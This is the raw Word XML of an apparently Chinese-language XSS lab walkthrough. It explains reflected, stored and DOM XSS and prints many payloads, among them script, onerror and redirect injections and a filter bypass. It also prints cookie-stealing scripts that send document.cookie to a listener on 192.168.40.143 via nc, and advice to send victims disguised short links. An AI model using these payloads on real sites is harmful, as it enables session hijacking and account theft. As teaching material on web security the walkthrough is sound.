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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>反射型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（Refiected）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24500" cy="1685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324725" cy="1821815"/>
            <wp:effectExtent l="0" t="0" r="952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393940" cy="3332480"/>
            <wp:effectExtent l="0" t="0" r="1651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45735" cy="4135120"/>
            <wp:effectExtent l="0" t="0" r="1206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10475" cy="3514725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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直接嵌入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&lt;script&gt;alert('xss')&lt;/script&gt;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958205" cy="475361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71870" cy="333184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&lt;body onload=alert('xss')&gt;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7324090" cy="33508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 href=http://www.4399.com&gt;登录&lt;/a&gt;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7322820" cy="3946525"/>
            <wp:effectExtent l="0" t="0" r="1143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18375" cy="3557270"/>
            <wp:effectExtent l="0" t="0" r="158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8375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&lt;img src=http://www.baidu.com/a.jpg onerror=alert('xss')&gt;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039225" cy="4629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705850" cy="4400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&lt;a href ='' onclick=alert('你是猪')&gt;登录&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6769735" cy="3726180"/>
            <wp:effectExtent l="0" t="0" r="1206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8439150" cy="3990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&lt;script&gt;window.location="http://www.baidu.com"&lt;/script&gt;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8734425" cy="3895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055225" cy="4734560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55225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获取Cookie值</w:t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&lt;script&gt;alert(document.cookie)&lt;/script&gt;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0061575" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="158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6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867650" cy="5905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监听（测试连接）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┌──(root💀kali)-[~/桌面]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">└─# nc -vnlp 80  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895975" cy="1123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在执行</w:t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&lt;iframe src='http://192.168.40.143/a.jpg' height='0' width'0'&gt;&lt;/iframe&gt;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8620125" cy="40195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最后查看监听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639050" cy="3267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152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监听Cookie值 （反弹Cookie值）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┌──(root💀kali)-[~/桌面]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">└─# nc -vnlp 80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686300" cy="1095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&lt;script&gt;new Image().src="http://192.168.40.143/c.php?output="+document.cookie;&lt;/script&gt;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991860" cy="2946400"/>
            <wp:effectExtent l="0" t="0" r="889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查看监听 （Cookie值）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467475" cy="2550795"/>
            <wp:effectExtent l="0" t="0" r="952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34225" cy="2066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┌──(root💀kali)-[~/桌面]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└─# nc -vnlp 80   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553200" cy="1181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&lt;script&gt;new Image().src="http://192.168.40.143/c.php?output="+document.cookie;&lt;/script&gt;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43015" cy="3872230"/>
            <wp:effectExtent l="0" t="0" r="635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查看监听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325360" cy="3253105"/>
            <wp:effectExtent l="0" t="0" r="889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2536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19645" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="146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┌──(root💀kali)-[~/桌面]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└─# cd /var/www/html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┌──(root💀kali)-[/var/www/html]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└─# vim a.js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img = new Image();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img.src='http://192.168.40.143:88/cookie.php?cooie='+document.cookie;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900035" cy="1762760"/>
            <wp:effectExtent l="0" t="0" r="5715" b="889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0003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┌──(root💀kali)-[/var/www/html]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└─# /etc/init.d/apache2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Starting apache2 (via systemctl): apache2.service.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┌──(root💀kali)-[~/桌面]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└─# nc -vnlp 88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src='http://192.168.40.143/a.js'&gt;&lt;/script&gt;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568440" cy="3298825"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1587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然后查看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00950" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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XSS原理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XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为html 代码的注入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 用户输入能够控制输入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 原本程序要执行的代码  拼接了用户输入的数据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XSS 拼接的就是网页的html代码 可以拼接合适的html代码取执行恶意的JS语句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XSS的类型：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反射型XSS：提交的数据成功的实现了XSS，但是仅仅是对你这次访问产生了影响，是非持久型攻击。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存储型XSS：提交的数据成功的实现了XSS，存入了数据库，别人访问这个页面的时候就会自动触发，属于持久型。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DOM型XSS：利用DOM对象触发的XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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反射型XSS具体使用方法：</w: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比如百度存在反射型XSS，然后你构建可以窃取Cookie的JS语句，然后传参点在URL那里，然后我们通过短链接将他变为短链接，然后发给想要获取别人信息的人。然后人家如果登陆状态访问了就会触发XSS。</w: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(短链接：通俗来说，就是将长的URL网址，转换为简短的网址字符串，和DNS协议有点像，提供服务的网站会在数据库里面存储短链接对应的原本URL是什么，当你访问短链接，然后那边设置了302重定向跳转到原本的长URL)</w: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84455</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1955800" cy="263525"/>
                <wp:effectExtent l="6350" t="6350" r="19050" b="158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6330" y="4839335"/>
                          <a:ext cx="1955800" cy="263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5 攻击者使用目标用户的信息登录网站 完成攻击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3.75pt;margin-top:6.65pt;height:20.75pt;width:154pt;z-index:251668480;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#5B9BD5 [3204]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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CFrLoDbAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQA&#10;AAAIAIdO4kAOs9KKmAIAAC4FAAAOAAAAAAAAAAEAIAAAACo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5 攻击者使用目标用户的信息登录网站 完成攻击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             </w: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1142365</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>20320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="509905" cy="381000"/>
                <wp:effectExtent l="6350" t="6350" r="17145" b="127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5725" y="5141595"/>
                          <a:ext cx="50990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黑客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95pt;margin-top:1.6pt;height:30pt;width:40.15pt;z-index:251658240;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#5B9BD5 [3204]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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3+E0T2gAAAAgBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAA&#10;CACHTuJAM0OhCpcCAAAtBQAADgAAAAAAAAABACAAAAAp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黑客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187960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2370455" cy="683895"/>
                <wp:effectExtent l="0" t="48895" r="10795" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="41" name="肘形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2117090" y="5141595"/>
                          <a:ext cx="2370455" cy="683895"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 4998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52.5pt;margin-top:14.8pt;height:53.85pt;width:186.65pt;rotation:11796480f;z-index:251667456;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Z10q83AAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93&#10;bnJldi54bWxQSwECFAAUAAAACACHTuJA6fAShjUCAAAjBAAADgAAAAAAAAABACAAAAArAQAAZHJz&#10;L2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAA0gUAAAAA&#10;" adj="10797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1764030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>119380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2510155" cy="644525"/>
                <wp:effectExtent l="0" t="4445" r="4445" b="55880"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="肘形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05330" y="5264785"/>
                          <a:ext cx="2510155" cy="644525"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 5001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38.9pt;margin-top:9.4pt;height:50.75pt;width:197.65pt;z-index:251666432;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Kojv02wAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwEC&#10;FAAUAAAACACHTuJAcpQdUyoCAAAUBAAADgAAAAAAAAABACAAAAAqAQAAZHJzL2Uyb0RvYy54bWxQ&#10;SwUGAAAAAAYABgBZAQAAxgUAAAAA&#10;" adj="10803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1355090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>83820</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="17145" cy="1075690"/>
                <wp:effectExtent l="47625" t="0" r="49530" b="1016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405890" y="5589905"/>
                          <a:ext cx="17145" cy="1075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6.7pt;margin-top:6.6pt;height:84.7pt;width:1.35pt;z-index:251662336;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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b9kD0&#10;2AAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJA&#10;rDpU6SECAAD6AwAADgAAAAAAAAABACAAAAAn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118110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="1002030"/>
                <wp:effectExtent l="48895" t="0" r="65405" b="762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86890" y="5612765"/>
                          <a:ext cx="0" cy="10020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9.95pt;margin-top:9.3pt;height:78.9pt;width:0pt;z-index:251663360;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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r5dgbXAAAA&#10;CgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kCAb3Q8&#10;HgIAAPYDAAAOAAAAAAAAAAEAIAAAACY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63500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1584960" cy="459740"/>
                <wp:effectExtent l="6350" t="6350" r="8890" b="1016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1045" y="5752465"/>
                          <a:ext cx="1584960" cy="459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 xml:space="preserve">4  </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                                <w:sz w:val="11"/>
                                <w:szCs w:val="11"/>
                                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                              </w:rPr>
                              <w:t>目标用户页面跳转到攻击者的网站 攻击者获取用户信息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9.6pt;margin-top:5pt;height:36.2pt;width:124.8pt;z-index:251670528;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#5B9BD5 [3204]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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DpYMZm2gAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAU&#10;AAAACACHTuJAztLQ7JoCAAAuBQAADgAAAAAAAAABACAAAAAp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 xml:space="preserve">4  </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                          <w:sz w:val="11"/>
                          <w:szCs w:val="11"/>
                          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                        </w:rPr>
                        <w:t>目标用户页面跳转到攻击者的网站 攻击者获取用户信息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-113030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>188595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1125855" cy="643890"/>
                <wp:effectExtent l="6350" t="6350" r="10795" b="1651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675" y="5735955"/>
                          <a:ext cx="1125855" cy="643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sz w:val="11"/>
                                <w:szCs w:val="1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1"/>
                                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                              </w:rPr>
                              <w:t>1 攻击者以某种方式发送xss的http链接给用户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.9pt;margin-top:14.85pt;height:50.7pt;width:88.65pt;z-index:251669504;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#5B9BD5 [3204]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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NP9k8jcAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIU&#10;ABQAAAAIAIdO4kCEKECimgIAACwFAAAOAAAAAAAAAAEAIAAAACsBAABkcnMvZTJvRG9jLnhtbFBL&#10;BQYAAAAABgAGAFkBAAA3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sz w:val="11"/>
                          <w:szCs w:val="1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1"/>
                          <w:szCs w:val="11"/>
                          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                        </w:rPr>
                        <w:t>1 攻击者以某种方式发送xss的http链接给用户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center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11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4382770</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>24765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="822960" cy="532130"/>
                <wp:effectExtent l="6350" t="6350" r="889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532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5.1pt;margin-top:1.95pt;height:41.9pt;width:64.8pt;z-index:251661312;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#5B9BD5 [3204]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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1T6n+2wAA&#10;AAgBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAbfBj&#10;kY0CAAAhBQAADgAAAAAAAAABACAAAAAqAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAA&#10;K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服务器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ab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2981"/>
        </w:tabs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111125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2677795" cy="705485"/>
                <wp:effectExtent l="0" t="4445" r="8255" b="52070"/>
                <wp:wrapNone/>
                <wp:docPr id="39" name="肘形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2010410" y="6245860"/>
                          <a:ext cx="2677795" cy="705485"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 470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39.3pt;margin-top:8.75pt;height:55.55pt;width:210.85pt;rotation:11796480f;z-index:251665408;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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CAibdcAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAhQAFAAAAAgAh07iQLnJy4o7AgAALQQAAA4AAAAAAAAAAQAgAAAAJgEAAGRy&#10;cy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAANMFAAAAAA==&#10;" adj="10167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1853565</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>16510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2454275" cy="633095"/>
                <wp:effectExtent l="0" t="48895" r="3175" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="38" name="肘形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33270" y="6043930"/>
                          <a:ext cx="2454275" cy="633095"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 5001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45.95pt;margin-top:1.3pt;height:49.85pt;width:193.25pt;z-index:251664384;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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FXTRi1QAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQ&#10;SwECFAAUAAAACACHTuJA59HLZjMCAAAeBAAADgAAAAAAAAABACAAAAAkAQAAZHJzL2Uyb0RvYy54&#10;bWxQSwUGAAAAAAYABgBZAQAAyQUAAAAA&#10;" adj="10803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3"/>
          <w:szCs w:val="1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1736090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>41910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2583815" cy="297815"/>
                <wp:effectExtent l="6350" t="6350" r="19685" b="1968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4270" y="6611620"/>
                          <a:ext cx="2583815" cy="297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2 目标用户登录此网站 在登录期间打开了攻击者发送的xss链接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7pt;margin-top:3.3pt;height:23.45pt;width:203.45pt;z-index:251671552;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#5B9BD5 [3204]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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H+U339sAAAAIAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgA&#10;h07iQN1r3iuUAgAALgUAAA4AAAAAAAAAAQAgAAAAKgEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAG&#10;AAYAWQEAAD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2 目标用户登录此网站 在登录期间打开了攻击者发送的xss链接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              </w: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1160145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>17780</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="509905" cy="381000"/>
                <wp:effectExtent l="6350" t="6350" r="17145" b="127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1.35pt;margin-top:1.4pt;height:30pt;width:40.15pt;z-index:251659264;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#5B9BD5 [3204]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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Axkgv3ZAAAACAEA&#10;AA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kCnC8XRiwIA&#10;ACEFAAAOAAAAAAAAAAEAIAAAACg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用户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1696720</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>114935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1428750" cy="235585"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="2476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6330" y="7065645"/>
                          <a:ext cx="1428750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3 网站执行了此xss攻击脚本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6pt;margin-top:9.05pt;height:18.55pt;width:112.5pt;z-index:251672576;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" fillcolor="#5B9BD5 [3204]" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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9N5b42wAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAU&#10;AAAACACHTuJA47Clq5kCAAAuBQAADgAAAAAAAAABACAAAAAq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3 网站执行了此xss攻击脚本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                                                                                                                                                                    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中级</w:t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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6770370" cy="5539740"/>
            <wp:effectExtent l="0" t="0" r="11430" b="381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581900" cy="3514725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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&lt;Script&gt;alert('xss')&lt;/script&gt;</w:t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6282690" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="381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>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="8989695" cy="2921000"/>
            <wp:effectExtent l="0" t="0" r="190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8969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&lt;sc&lt;script&gt;ript&gt;alert('xss')&lt;/script&gt;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8515350" cy="4610100"/>
            <wp:effectExtent l="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01050" cy="5367655"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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628255" cy="6162675"/>
            <wp:effectExtent l="0" t="0" r="10795" b="952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394065" cy="3885565"/>
            <wp:effectExtent l="0" t="0" r="6985" b="63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9406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&lt;a href ='' onclick=alert('你是猪')&gt;登录&lt;/a&gt;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7250430" cy="3429635"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1841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366635" cy="4733290"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1016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66635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 href=http://www.4399.com&gt;登录&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="8620125" cy="4410075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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620125" cy="4772025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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711815" cy="4634865"/>
            <wp:effectExtent l="0" t="0" r="13335" b="1333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71181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2F5E88"/>
    <w:rsid w:val="3BC73289"/>
    <w:rsid w:val="3C5D74CA"/>
    <w:rsid w:val="57AD2AA6"/>
    <w:rsid w:val="629E689D"/>
    <w:rsid w:val="6CAF7C13"/>
    <w:rsid w:val="75D87293"/>
    <w:rsid w:val="7CBB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2021-06-21T02:05:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-21T07:34:16Z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